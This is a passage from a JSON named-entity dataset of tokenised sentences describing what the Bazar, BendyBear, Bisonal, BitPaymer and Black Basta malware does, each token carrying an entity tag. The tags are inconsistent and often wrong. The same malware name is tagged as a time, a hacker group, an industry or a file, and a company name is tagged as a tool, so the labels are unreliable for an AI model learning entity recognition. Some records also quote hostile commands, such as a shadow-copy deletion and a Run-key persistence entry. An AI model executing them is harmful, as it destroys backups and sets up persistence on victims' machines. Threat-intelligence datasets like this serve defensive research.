"Bankshot", "can", "terminate", "a", "specific", "process", "by", "its", "process", "id." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "use", "TLS", "in", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Bazar", "has", "been", "downloaded", "via", "Windows", "BITS", "functionality." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar's", "loader", "can", "delete", "scheduled", "tasks", "created", "by", "a", "previous", "instance", "of", "the", "malware." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "has", "been", "signed", "with", "fake", "certificates", "including", "those", "appearing", "to", "be", "from", "VB", "CORPORATE", "PTY.", "LTD." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Tool" ] }, { "tokens": [ "Bazar", "can", "retrieve", "information", "from", "the", "infected", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "decrypt", "downloaded", "payloads.", "Bazar", "also", "resolves", "strings", "and", "other", "artifacts", "at", "runtime." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "has", "manually", "loaded", "ntdll", "from", "disk", "in", "order", "to", "identity", "and", "remove", "API", "hooks", "set", "by", "security", "products." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "has", "the", "ability", "to", "identify", "domain", "administrator", "accounts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Purp", "B-Features", "O", "O" ] }, { "tokens": [ "Bazar", "can", "implement", "DGA", "using", "the", "current", "date", "as", "a", "seed", "variable." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "use", "Nltest", "tools", "to", "obtain", "information", "about", "the", "domain." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "The", "Bazar", "loader", "has", "used", "dual-extension", "executable", "files", "such", "as", "PreviewReport.DOC.exe." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Bazar", "can", "hash", "then", "resolve", "API", "calls", "at", "runtime." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "has", "used", "XOR,", "RSA2,", "and", "RC4", "encrypted", "files." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "has", "the", "ability", "to", "use", "an", "alternative", "C2", "server", "if", "the", "primary", "server", "fails." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "delete", "its", "loader", "using", "a", "batch", "file", "in", "the", "Windows", "temporary", "folder." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-HackOrg", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "enumerate", "the", "victim's", "desktop." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "download", "and", "deploy", "additional", "payloads,", "including", "ransomware", "and", "post-exploitation", "frameworks", "such", "as", "Cobalt", "Strike." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Bazar", "can", "identify", "administrator", "accounts", "on", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "gain", "execution", "after", "a", "user", "clicks", "on", "a", "malicious", "link", "to", "decoy", "landing", "pages", "hosted", "on", "Google", "Docs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "create", "a", "task", "named", "to", "appear", "benign." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Bazar", "loader", "has", "named", "malicious", "shortcuts", "\"adobe\"", "and", "mimicked", "communications", "software." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Bazar", "loader", "is", "used", "to", "download", "and", "execute", "the", "Bazar", "backdoor." ], "ner_tags": [ "O", "B-Tool", "B-SecTeam", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "B-Way", "B-Tool" ] }, { "tokens": [ "Bazar", "can", "use", "various", "APIs", "to", "allocate", "memory", "and", "facilitate", "code", "execution/injection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "enumerate", "shared", "drives", "on", "the", "domain." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "execute", "a", "PowerShell", "script", "received", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "identity", "the", "current", "process", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "inject", "into", "a", "target", "process", "using", "process", "doppelgänging." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "inject", "into", "a", "target", "process", "including", "Svchost,", "Explorer,", "and", "cmd", "using", "process", "hollowing." ], "ner_tags": [ "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Way", "O", "O", "B-Way" ] }, { "tokens": [ "Bazar", "can", "inject", "code", "through", "calling", "<code>VirtualAllocExNuma</code>." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "query", "<code>Windows\\CurrentVersion\\Uninstall</code>", "for", "installed", "applications." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "create", "or", "add", "files", "to", "Registry", "Run", "Keys", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "enumerate", "remote", "systems", "using", "<code>", "Net", "View</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "create", "a", "scheduled", "task", "for", "persistence." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "identify", "the", "installed", "antivirus", "engine." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "establish", "persistence", "by", "writing", "shortcuts", "to", "the", "Windows", "Startup", "folder." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "query", "the", "Registry", "for", "installed", "applications." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "has", "a", "variant", "with", "a", "packed", "payload." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "has", "been", "spread", "via", "emails", "with", "embedded", "malicious", "links." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "send", "C2", "communications", "with", "XOR", "encryption." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "fingerprint", "architecture,", "computer", "name,", "and", "OS", "version", "on", "the", "compromised", "host.", "Bazar", "can", "also", "check", "if", "the", "Russian", "language", "is", "installed", "on", "the", "infected", "machine", "and", "terminate", "if", "it", "is", "found." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-Features", "O", "O", "B-Area", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "perform", "a", "check", "to", "ensure", "that", "the", "operating", "system's", "keyboard", "and", "language", "settings", "are", "not", "set", "to", "Russian." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "collect", "the", "IP", "address", "and", "NetBIOS", "name", "of", "an", "infected", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "identify", "the", "username", "of", "the", "infected", "user." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "collect", "the", "time", "on", "the", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "use", "a", "timer", "to", "delay", "execution", "of", "core", "functionality." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "attempt", "to", "overload", "sandbox", "analysis", "by", "sending", "1550", "calls", "to", "<code>printf</code>." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "use", "HTTP", "and", "HTTPS", "over", "ports", "80", "and", "443", "in", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "downloads", "have", "been", "hosted", "on", "Google", "Docs." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "launch", "cmd.exe", "to", "perform", "reconnaissance", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "execute", "a", "WMI", "query", "to", "gather", "information", "about", "the", "installed", "antivirus", "engine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Tool", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bazar", "can", "use", "Winlogon", "Helper", "DLL", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "BendyBear", "has", "decrypted", "function", "blocks", "using", "a", "XOR", "key", "during", "runtime", "to", "evade", "detection." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BendyBear", "has", "encrypted", "payloads", "using", "RC4", "and", "XOR." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-HackOrg", "O", "B-Tool" ] }, { "tokens": [ "BendyBear", "is", "designed", "to", "download", "an", "implant", "from", "a", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BendyBear", "has", "used", "byte", "randomization", "to", "obscure", "its", "behavior." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BendyBear", "can", "load", "and", "execute", "modules", "and", "Windows", "Application", "Programming", "(API)", "calls", "using", "standard", "shellcode", "API", "hashing." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BendyBear", "has", "used", "a", "custom", "RC4", "and", "XOR", "encrypted", "protocol", "over", "port", "443", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BendyBear", "can", "query", "the", "host's", "Registry", "key", "at", "<code>HKEY_CURRENT_USER\\Console\\QuickEdit</code>", "to", "retrieve", "data." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "BendyBear", "communicates", "to", "a", "C2", "server", "over", "port", "443", "using", "modified", "RC4", "and", "XOR-encrypted", "chunks." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BendyBear", "has", "the", "ability", "to", "determine", "local", "time", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "BendyBear", "can", "check", "for", "analysis", "environments", "and", "signs", "of", "debugging", "using", "the", "Windows", "API", "<code>kernel32!GetTickCountKernel32</code>", "call." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "been", "loaded", "through", "a", "`.wll`", "extension", "added", "to", "the", "`", "%APPDATA%\\microsoft\\word\\startup\\`", "repository." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "appended", "random", "binary", "data", "to", "the", "end", "of", "itself", "to", "generate", "a", "large", "binary." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "collected", "information", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "decoded", "strings", "in", "the", "malware", "using", "XOR", "and", "RC4." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "used", "a", "dynamic", "DNS", "service", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "Bisonal's", "DLL", "file", "and", "non-malicious", "decoy", "file", "are", "encrypted", "with", "RC4", "and", "some", "function", "name", "strings", "are", "obfuscated." ], "ner_tags": [ "B-Idus", "B-SamFile", "I-SamFile", "O", "O", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "added", "the", "exfiltrated", "data", "to", "the", "URL", "over", "the", "C2", "channel." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "will", "delete", "its", "dropper", "and", "VBS", "scripts", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "can", "retrieve", "a", "file", "listing", "from", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "the", "capability", "to", "download", "files", "to", "execute", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "relied", "on", "users", "to", "execute", "malicious", "file", "attachments", "delivered", "via", "spearphishing", "emails." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Bisonal", "dropped", "a", "decoy", "payload", "with", "a", ".jpg", "extension", "that", "contained", "a", "malicious", "Visual", "Basic", "script." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O" ] }, { "tokens": [ "Bisonal", "has", "renamed", "malicious", "code", "to", "`msacm32.dll`", "to", "hide", "within", "a", "legitimate", "library;", "earlier", "versions", "were", "disguised", "as", "`winhelp`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "deleted", "Registry", "keys", "to", "clean", "up", "its", "prior", "activity." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "used", "the", "Windows", "API", "to", "communicate", "with", "the", "Service", "Control", "Manager", "to", "execute", "a", "thread." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "used", "raw", "sockets", "for", "network", "communication." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "can", "obtain", "a", "list", "of", "running", "processes", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "supported", "use", "of", "a", "proxy", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "used", "the", "RegQueryValueExA", "function", "to", "retrieve", "proxy", "information", "in", "the", "Registry." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "added", "itself", "to", "the", "Registry", "key", "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\CurrentVersion\\Run\\</code>", "for", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "used", "rundll32.exe", "to", "execute", "as", "part", "of", "the", "Registry", "Run", "key", "it", "adds:", "<code>HKEY_CURRENT_USER", "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\”vert”", "=", "“rundll32.exe", "c:\\windows\\temp\\pvcu.dll", ",", "Qszdez”</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Bisonal", "has", "used", "the", "MPRESS", "packer", "and", "similar", "tools", "for", "obfuscation." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "been", "delivered", "as", "malicious", "email", "attachments." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "encoded", "binary", "data", "with", "Base64", "and", "ASCII." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "variants", "reported", "on", "in", "2014", "and", "2015", "used", "a", "simple", "XOR", "cipher", "for", "C2.", "Some", "Bisonal", "samples", "encrypt", "C2", "communications", "with", "RC4." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Time", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "used", "commands", "and", "API", "calls", "to", "gather", "system", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Bisonal", "can", "execute", "<code>ipconfig</code>", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "can", "check", "the", "system", "time", "set", "on", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "checked", "if", "the", "malware", "is", "running", "in", "a", "virtual", "environment", "with", "the", "anti-debug", "function", "GetTickCount()", "to", "compare", "the", "timing." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "can", "check", "to", "determine", "if", "the", "compromised", "system", "is", "running", "on", "VMware." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal's", "dropper", "creates", "VBS", "scripts", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "B-SamFile", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "used", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "launched", "cmd.exe", "and", "used", "the", "ShellExecuteW()", "API", "function", "to", "execute", "commands", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bisonal", "has", "been", "modified", "to", "be", "used", "as", "a", "Windows", "service." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Features" ] }, { "tokens": [ "BitPaymer", "can", "suppress", "UAC", "prompts", "by", "setting", "the", "<code>HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command</code>", "registry", "key", "on", "Windows", "10", "or", "<code>HKCU\\Software\\Classes\\mscfile\\shell\\open\\command</code>", "on", "Windows", "7", "and", "launching", "the", "<code>eventvwr.msc</code>", "process,", "which", "launches", "BitPaymer", "with", "elevated", "privileges." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "BitPaymer", "can", "import", "a", "hard-coded", "RSA", "1024-bit", "public", "key,", "generate", "a", "128-bit", "RC4", "key", "for", "each", "file,", "and", "encrypt", "the", "file", "in", "place,", "appending", "<code>.locked</code>", "to", "the", "filename." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BitPaymer", "has", "used", "RC4-encrypted", "strings", "and", "string", "hashes", "to", "avoid", "identifiable", "strings", "within", "the", "binary." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BitPaymer", "compares", "file", "names", "and", "paths", "to", "a", "list", "of", "excluded", "names", "and", "directory", "names", "during", "encryption." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BitPaymer", "attempts", "to", "remove", "the", "backup", "shadow", "files", "from", "the", "host", "using", "<code>vssadmin.exe", "Delete", "Shadows", "/All", "/Quiet</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "BitPaymer", "can", "enumerate", "the", "sessions", "for", "each", "user", "logged", "onto", "the", "infected", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BitPaymer", "can", "set", "values", "in", "the", "Registry", "to", "help", "in", "execution." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BitPaymer", "has", "copied", "itself", "to", "the", "<code>:bin</code>", "alternate", "data", "stream", "of", "a", "newly", "created", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BitPaymer", "has", "used", "dynamic", "API", "resolution", "to", "avoid", "identifiable", "strings", "within", "the", "binary,", "including", "<code>RegEnumKeyW</code>." ], "ner_tags": [ "B-Way", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BitPaymer", "can", "search", "for", "network", "shares", "on", "the", "domain", "or", "workgroup", "using", "<code>net", "view", "<host></code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BitPaymer", "can", "use", "the", "RegEnumKeyW", "to", "iterate", "through", "Registry", "keys." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BitPaymer", "has", "set", "the", "run", "key", "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BitPaymer", "can", "use", "<code>net", "view</code>", "to", "discover", "remote", "systems." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Purp" ] }, { "tokens": [ "BitPaymer", "can", "enumerate", "existing", "Windows", "services", "on", "the", "host", "that", "are", "configured", "to", "run", "as", "LocalSystem." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BitPaymer", "can", "modify", "the", "timestamp", "of", "an", "executable", "so", "that", "it", "can", "be", "identified", "and", "restored", "by", "the", "decryption", "tool." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BitPaymer", "can", "use", "the", "tokens", "of", "users", "to", "create", "processes", "on", "infected", "systems." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "BitPaymer", "can", "use", "<code>icacls", "/reset</code>", "and", "<code>takeown", "/F</code>", "to", "reset", "a", "targeted", "executable's", "permissions", "and", "then", "take", "ownership." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BitPaymer", "has", "attempted", "to", "install", "itself", "as", "a", "service", "to", "maintain", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Black", "Basta", "had", "added", "data", "prior", "to", "the", "Portable", "Executable", "(PE)", "header", "to", "prevent", "automatic", "scanners", "from", "identifying", "the", "payload." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Black", "Basta", "dropper", "has", "been", "digitally", "signed", "with", "a", "certificate", "issued", "by", "Akeo", "Consulting", "for", "legitimate", "executables", "used", "for", "creating", "bootable", "USB", "drives." ], "ner_tags": [ "O", "B-SamFile", "B-Tool", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "I-Features", "O" ] }, { "tokens": [ "Black", "Basta", "can", "encrypt", "files", "with", "the", "ChaCha20", "cypher", "and", "using", "a", "multithreaded", "process", "to", "increase", "speed." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "B-Features", "I-Features", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Black", "Basta", "dropper", "can", "check", "system", "flags,", "CPU", "registers,", "CPU", "instructions,", "process", "timing,", "system", "libraries,", "and", "APIs", "to", "determine", "if", "a", "debugger", "is", "present." ], "ner_tags": [ "O", "I-SamFile", "B-SecTeam", "B-SecTeam", "O", "I-Features", "I-Features", "O", "I-Features", "O", "O", "O", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Black", "Basta", "can", "enumerate", "specific", "files", "for", "encryption." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Features", "O", "O", 